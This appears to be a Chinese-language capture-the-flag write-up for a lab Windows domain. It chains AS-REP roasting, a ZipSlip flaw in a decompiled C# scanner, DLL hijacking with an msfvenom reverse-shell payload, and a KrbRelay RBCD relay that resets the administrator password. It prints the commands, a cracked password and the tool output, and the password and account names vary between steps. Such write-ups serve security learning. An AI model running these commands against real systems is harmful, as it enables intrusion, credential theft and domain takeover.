得到一個 dev 的子域名

{A418ECBE-54A0-4B54-8E1F-C0FC1389B5BA}

看起來是上傳 .exe 並且掃描是否是惡意軟體的服務

{ECC432BC-9FED-48D5-BBF6-B078C28E9949}

重複測試後這邊能丟 .exe 上去 , 也能丟 .zip 上去
.zip 則會自動解壓縮到掃描等待區內 , 網頁這邊並沒找到能用的攻擊面

FTP Enmuration

只有讀取的權限 , 不能上傳或刪除任何檔案

資料夾命名樣式跟網頁看到的很像 , 應該就是 dev 所提供服務的資料夾

Wget 匿名 Dump 下來所有檔案
Payload:

1
wget -r --no-parent --user="anonymous" --password="" ftp://10.129.197.115/

File: /app

查看了幾個文件的 json 大概是 C# 寫的一個程式

{51F492CE-6D9D-4C95-93B1-8111A4FE96A3}

changelog 提到 automation using svc_scan
有可能 svc_scan 是一個服務帳號執行服務的帳號可能設定防護比較薄弱不需要Pre-authentication試試看 Roasting

AS-REP Roasting

AS-REP Roasting
ASREPRoast 是一種安全攻擊 (security attack),專門利用未設定「需要 Kerberos 預驗證 (Kerberos pre-authentication required)」屬性的使用者帳號。

本質上,此漏洞允許攻擊者在不需要使用者密碼的情況下,直接向網域控制站 (Domain Controller, DC) 請求使用者的身份驗證。DC 隨後會回傳一則使用該使用者「密碼衍生金鑰 (password-derived key)」加密的訊息,攻擊者便可嘗試進行離線破解 (crack offline) 以獲取使用者的明文密碼。

{032CBF2C-9997-485C-8B58-DF92A5CCD6B2}

獲得一組明文帳號

svc_scan:Sunshin1

試了一會發現只能用於 SMB 服務上

{AEC128A7-1CC8-4D84-92C6-7F887ED81C07}

且這個帳號對 queue 有讀寫的權限

Dump File

先往其他突破口 , 分析一下 FTP 下載回來的檔案推斷出應該是網頁提供服務的軟體 , 資料夾跟網站顯示出的一樣唯獨沒有顯示 /app , 所以大概能推斷出 /app 是執行服務的資料夾

圖片

先對網頁提供服務的應用程式逆向看看

Reverse C#

File 查看 dll 資訊是不是 C# 寫的

{55B8CF96-86E3-47F9-A581-C8FCE55660BF}

隨後使用 ilspycmd 逆向工程查看功能

簡介C#編譯成IL,再由JIT編譯成機器碼的過程
C# 其實並不像 C 或 Rust 直接把執行檔編譯成二進制執行檔會先編譯成 IL , 這邊很容易就能透過一些工具復原成容易閱讀的格式所以 C# 的程式很容易逆向閱讀 , 但也能直接編譯成二進制

Payload : ilspycmd SampleScanner.dll

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.Versioning;
using System.Text;

[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
[assembly: TargetFramework(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")]
[assembly: AssemblyCompany("SampleScanner")]
[assembly: AssemblyConfiguration("Release")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyInformationalVersion("1.0.0")]
[assembly: AssemblyProduct("SampleScanner")]
[assembly: AssemblyTitle("SampleScanner")]
[assembly: AssemblyVersion("1.0.0.0")]
namespace SampleScanner;

internal class Program
{
	public static IEnumerable<int> PatternAt(byte[] source, byte[] pattern)
	{
		for (int i = 0; i < source.Length; i++)
		{
			if (source.Skip(i).Take(pattern.Length).SequenceEqual(pattern))
			{
				yield return i;
			}
		}
	}

	private static void Main(string[] args)
	{
		string text = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EYCAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
		text.Replace("EYCAR", "EICAR");
		byte[] bytes = Encoding.ASCII.GetBytes(text);
		string[] files = Directory.GetFiles("C:\\samples\\queue\\", "*", SearchOption.AllDirectories);
		foreach (string text2 in files)
		{
			if (text2.EndsWith(".zip"))
			{
				using ZipArchive zipArchive = ZipFile.OpenRead(text2);
				foreach (ZipArchiveEntry entry in zipArchive.Entries)
				{
					string destinationFileName = Path.Combine("C:\\samples\\queue\\", entry.FullName);
					entry.ExtractToFile(destinationFileName);
				}
				File.Delete(text2);
			}
			else if (PatternAt(File.ReadAllBytes(text2), bytes).Any())
			{
				File.Copy(text2, text2.Replace("queue", "malicious"), overwrite: true);
				File.Delete(text2);
			}
			else
			{
				File.Copy(text2, text2.Replace("queue", "benign"), overwrite: true);
				File.Delete(text2);
			}
		}
	}
}

主要功能是根據特徵碼解壓縮掃描完丟到另一個資料夾

發現上面原始碼有段功能是如果是 .zip檔案 , 就直接把檔案解壓縮到絕對路徑加上 zip 的檔案全名 , 所以只要創建一個有路徑的 zip 檔案 , 就能把想要放置的檔案解壓縮到任何地方

1
Path.Combine("C:\\samples\\queue\\", entry.FullName)

ZipSlip

ZipSlip 是一個越權寫入的一個技巧 , 通過把檔案命名為路徑的樣式 , 把檔案任意寫入到想要寫入的資料夾 , dll 分析出的是

C:\\samples\\queue\\ + <檔案名稱>

通過把檔案命名成 ..\app\guertena.txt 就能把檔案寫入到 \app

DLL 劫持

但是為甚麼要寫入 \app ?

因為 C# 的程式通常會依賴系統的 dll 檔案所提供的功能首先會去主要存放的路徑尋找 , 但如果同個目錄就存在所需的 dll 便會直接取用

所以我們先分析 SampleScanner.exe 需要甚麼再來做劫持

把檔案丟到 Windows 環境做測試

Procmon

{1CA90B5E-1C52-42DA-B4AE-BBD451846181}

用濾網找一找該程式執行時會自動尋找取用的 dll
我們肯定沒有權限取用C:\Program Files\dotnet\host\fxr\10.0.7\hostfxr.dll
但是我注意到他會先去找資料夾底下的 hostfxr.dll
這樣就鎖定了劫持的目標

{454FF725-5A59-4D45-AE74-7AB6ED6FDC1E}

組合攻擊鏈

  1. 帳號 svc_scan:Sunshin1 通過 smb 可以讀寫 queue 資料夾
  2. SampleScanner.exe 執行時會尋找資料夾下的 hostfxr.dll
  3. 通過 ZipSlip 能上傳 Payload 讓程式解壓縮然後寫入 app
  4. SampleScanner.exe 執行時也會執行我們的 Payload 從而取的權限

先建立一個 Payload

1
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.44 lport=443 -f dll -o hostfxr.dll

{2B3DCF5A-AFA9-4ACA-85CA-1A9FE32ED490}

Python 創造一個 zip 包含路徑注入的 dll
{077353FF-81AB-47AF-82B7-8BD0E5791865}

通過 SMB 把檔案丟進去{36E6285A-E8CD-404B-816E-82212DE5C2EF}
這個過程裡面的機器人會自動解壓縮我們的 meow.zip
然而通過剛剛攻擊鍊中的 ZipSlip 會寫入惡意的 dll 到 /app
應用程式自動執行時則會取用我們放置的惡意 dll 回傳 reverse shell
{EE1238DF-EF35-42E3-B095-3A32B3DE5B4E}

這樣就成功取得 shell
{C60C2BE2-C877-4C4A-B7EC-3EB07D95EBB9}
user D0ne !

Root.txt

提權

上傳 Payload
{EBF0D362-04B8-453B-8890-BC4E1AD06107}

{19AC1AE1-3213-4288-BE49-329C24649109}

{D6C0FCA6-0A68-4685-88CA-0EA842C8F789}

{DC324FBF-BDDF-4136-95B3-3AD292B1A4DD}

Certify 掃描 AD 資訊但沒有甚麼收穫
{79E6EAE3-F8E6-4C0D-BFE8-03D509FC74FA}

查詢一下 MAQ

Machine Account Quota 機器帳號配額

微軟為了方便 IT 人員部署電腦 , 預設允許「網域內的任何普通使用者 , 都可以將最多 10 台新電腦加入網域 , 連我們的服務帳號 svc_scan 都行

所以算是一小步的提權 , 新增的帳號肯定算是網域的普通預設帳號

這邊檢查發現 LDAPsigning 顯示為 None , 代表伺服器沒有強制驗證通訊來源存在被中繼攻擊 Relay Attack 利用的漏洞

因此可以利用前面創造的新網域電腦帳號 , 去觸發並中繼一個帶有 SYSTEM 權限的 DCOM 物件

把這個最高權限的認證轉發給 LDAP 服務,藉機把我們的假帳號寫入伺服器的 RBCD 白名單中一旦白名單生效 , 我們的假帳號就能合法假冒 Administrator

{533D8DBF-A191-4D4F-9A18-8FF36F6CAC70}

新增一個我的帳號進入網域內

1
proxychains impacket-addcomputer bruno.vl/svc_scan:'Sunshine1' -dc-ip 10.129.238.9 -computer-name meow$ -computer-pass meow

{340722A3-7AD8-42C5-9605-FB50FD780963}

查詢我的網域帳號的 SID

因為 LDAP 修改白名單時只認 SID

1
proxychains rpcclient -U 'bruno.vl\svc_scan%Sunshine1' 10.129.238.9 -c 'lookupnames guertena$'

{71DCDD7E-7730-43DC-9369-4F49470FC52B}
獲得 SID
guertena$ S-1-5-21-1536375944-4286418366-3447278137-5101 

1
2
3
4
5
KrbRelay.exe -spn ldap/brunodc.bruno.vl 
             -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 
             -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101 
             -ssl -port 10246 
             -reset-password administrator Lacure77#

  1. -spn ldap/brunodc.bruno.vl (Service Principal Name)

    原理: 指定攻擊的目標服務。SPN(服務主體名稱)用於告訴 Kerberos 要申請哪一個服務的票證。

    作用: 在這裡,它將擷取到的 Kerberos 身分驗證中繼(Relay)到網域控制站 brunodc.bruno.vl 的 ldap 服務。選擇 LDAP 是因為透過 LDAP 可以直接修改 Active Directory 中的物件屬性(例如修改帳戶權限或密碼)。

  2. -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

    原理: 指定要觸發(Coerce)的 COM / DCOM 類別識別碼 (Class ID)。Windows 內建許多以 NT AUTHORITY\SYSTEM 權限執行的 DCOM 服務。

    作用: 攻擊工具會呼叫這個特定的 CLSID(通常對應到某些本機特權服務),強制該服務透過指定的連接埠向攻擊者控制的接聽程式發起身分驗證。這樣攻擊者就能拿到本機 SYSTEM 的 Kerberos 驗證憑證。

  3. -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101

    原理: 設定 基於資源的限制委派 (Resource-Based Constrained Delegation, RBCD)。

    作用: 當成功以本機電腦帳戶的權限登入 DC 的 LDAP 後,工具會修改該電腦在 AD 中的 msDS-AllowedToActOnBehalfOfOtherIdentity 屬性。這段 SID 代表攻擊者已經控制的一個帳戶(例如一個普通的網域使用者或自建的電腦帳戶)。設定完成後,這個 SID 對應的帳戶將被允許「模擬任何使用者(包含 Domain Admin)」來存取這台受害電腦,從而達成完全控制本機的目標。

  4. -ssl

    原理: 強制透過 SSL/TLS 加密通道進行連線(即 LDAPS)。

    作用: 預設情況下,現代 Active Directory 會強制要求 LDAP 簽章(LDAP Signing),這會導致未加密的中繼攻擊失敗(因為攻擊者無法偽造簽章)。然而,如果將流量封裝在 TLS(LDAPS)隧道中,AD 會認為通訊已經足夠安全而繞過 LDAP 簽章的檢查。這是確保 LDAP 中繼攻擊能成功的關鍵參數。

  5. -port 10246

    原理: 指定攻擊工具本機接聽的通訊埠。

    作用: 配合 -clsid 參數,工具會在通訊埠 10246 上建立一個惡意的 RPC/COM 接聽程式,等待被強制觸發的本機 SYSTEM 服務連線過來交出它的 Kerberos 票證。

  6. -reset-password administrator Lacure77#

    原理: 定義在成功中繼到 LDAP 後要執行的 Payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
C:\Users\svc_scan\Desktop>KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101 -ssl -port 10246 -reset-password administrator Lacure77#
KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101 -ssl -port 10246 -reset-password administrator Lacure77#
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\svc_scan\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADPx2clKZkDfxkl96+ILeBDAswAAOgW//92QzrEfN65+CIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020108a28204b3048204af126c705a376898372f53ebb0824007488e1eeebfb4f8dcc64b210da436aff6ef2d8c619670a6ba1e266763dc0d52d3cc65dd01c4d3893c1705415b2f560a0e0418bdf5e86f45f02f9c365c2dbd86593264e373b753d6d6acfb75222d097e8b33f6c4dcb337ea5768a10f6e66a418ef385c031fef3e06e975854b82b0cae98e25335d50bca0890c2d9a86062a1c27bd2cc1bc742d288c0c5a2f14007d7673975fa99b3c38d41d852c286eee1dcfdb8d2397da9f3d128047854959b6e97e5529206c8ee37e0dbc274558c9251e43a918e38892c17ab69e930afcc73d967669ac67b266b837a9f0f34657ce2f48cc3f9a0492a6077b65055ed69655b46b623fb6aec12afada430e8f06a72a5775048d8c94807b723c36e8fdda731c0ab5067294fc68410d3f163ca365de97d51d8a31634ad8df77e40c4b8f918024f97f52d1a5a8fa319c44a3d5dacb6dfa53bf0c7d547569446e529236f08496d5be329dec89054e2d45263766f51cb85e24e06de56abb4361940fd9803bfd99219b35b4739f5de7721d2b637746c1c89e365309d5e928010bcaa3ab6af3988cea109f6517936238030895d72ca0e1b6c16c4f8f6f950d198860562d95d5c6664f6f0308317fd422952b41e42aae13f45fa056c8fa3396e64fd95d098ed0d79bcd8553005fdf06fd26929874b7afcbc0d8f036151a05a1a743d08aa5c279aacfac082181033545ecfe57b4bcf26ee9ec03a982744cfca8571d0fefa6e3290c4cfd2a7bf974b81d996ebc40d5a05c13b92517c55262cb03dff25915526b3c0bc9d535055d7b7e26d17c04059be2cb2e972b859bf25cf531c27535aba6b49656c7f4ceaa9c925db978c76da3c3615205fda19849ec23c27b666cf0096c57c9713b7b9301d3fe4e794817674661b2a9d45529b0df2b41fe4996c63a51e2be233560e5c7fb0a20bddf279a1bf442db2a3b059a65c4005f5f60d64fa57f113f0d58e9ee186464ba70793129dcfb6900e508cf3d931b7fc3aa3b7be39ff0a8c47908f718505ddf46d869e5afc66014d377288f14026180194188353fd8dea6e5ac40a6e3fd13f9cb379e36aa63ee5e674380a1cf0ffaad71b8202aa270e49560817171411b9692ab94f1397de93f84972875bc0cb6c5727849553d1d5a929cb3d1298e0b41f5f14560ccfa150962aa4f9c4e2c8ff5967ad21638f4c865b591ad907feee96dc436e83777d1abcb843401e0a10f1657f865961023e3a06aeb5362c944de60ffb3171abccd6ba25c9825337689a4d0c31809b41993621abfe3f816c7eacee9a90ba9088f3edd1e0b5502f503bda7f3ff1b5401b87bf46facc9ec32626f8b62406123b8ff12b7f7eb73a34ace8e7d32eed9be27f21480454aa405def23789075898e28d69174f9948ae6a0c901714a0e1795b5343419e2e71e534c04f76c5d077371af2f50401b80369f0e8b99def59a4213f38c0311aaa2251d099b110cbec7e35a79e84f68498a595b0bb2b8596d6ad11d13a0d59ced657e47e93602dfd2ecd54f740e95ede3b3aee4c79a20f166aa71ee13aff59ad1faf2b131ca1f295d8f4f8619e389dac0c574a88a69a3873308a83878946f920fea3451784ea69cc0371d62f1c4ce639ce166b6572fdc18f15098f6c53e1f28e48834265b8904d5114914a3bb3b2aa65b063cfaeb1218e6e50748066d2e2a482019e3082019aa003020112a28201910482018d56efc4d9ce2cfa5bfe8e28d387b3ecfe44954eb4a0fe35ed2d3aa6000e16e09139783e6e0958ba2ebdfaaeaf2c0b4aa676e17f4587f59d6e506c3fefd18431b2178aef9dc887b6be50f46f9df3e9eb4ee477fff7ccd9c575b0d9cdff5e1a3e4b32524f9e2b7a93a154ff6fdbf379138d4bbd5901eea220af3bbbf1fd6742c431ed91610aeac9c6a25008b1d834d032337f66c781fe40b10a44694ae9ca5ff21634525a02b4c1da3f19afb247da45c8237345b6c2bf005adf1f1357ef5fbc7753bf84e9d9099fd881c29580f1c3e26410a7567d7c3769434b14b9f700725b0fd687ec02f388b90ad772c660dbe9d9ac7d7c70d601754a3e58b7f15c7e3f813a4ec1b6899d6c0d5b9541b1d8258d80ef369f485925288770007cc16e03aed1846e8f33cda7896b93c33c5167f531068123af651a226de13f651410e4793044d4a4ecedea2d7e2a97974e1a276a86b306d4921c634230f47cfe95b54ec28b5496474b55c22e4dd5262f36061d0dc48c5f1c63be0e540e7e8e01680876c1d3c358ac9dce1b0d2b105c80f3070e267a
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e218ddf95e919d8989ed913b9910444e839b25c2ac7313b413fb53dea0abdbc8a06c478455252fc40a06ae65eddf6174f6e310dc30661854567f3c893aa5c346b880367180e19e4f0513e4df639ad320681bb665b2c43148f87d8f617988f777ae6bfb1597b13c1faa2ca0c8331e5
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a2440442d8b99db4f3a598a0f604fa182d9c8827348631dc1c5e6481cda1757863b5a739db575c10ccb79004d9c93e1d0ed217908384db1432bd0493743f426cb8007c485906
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS

got r00t !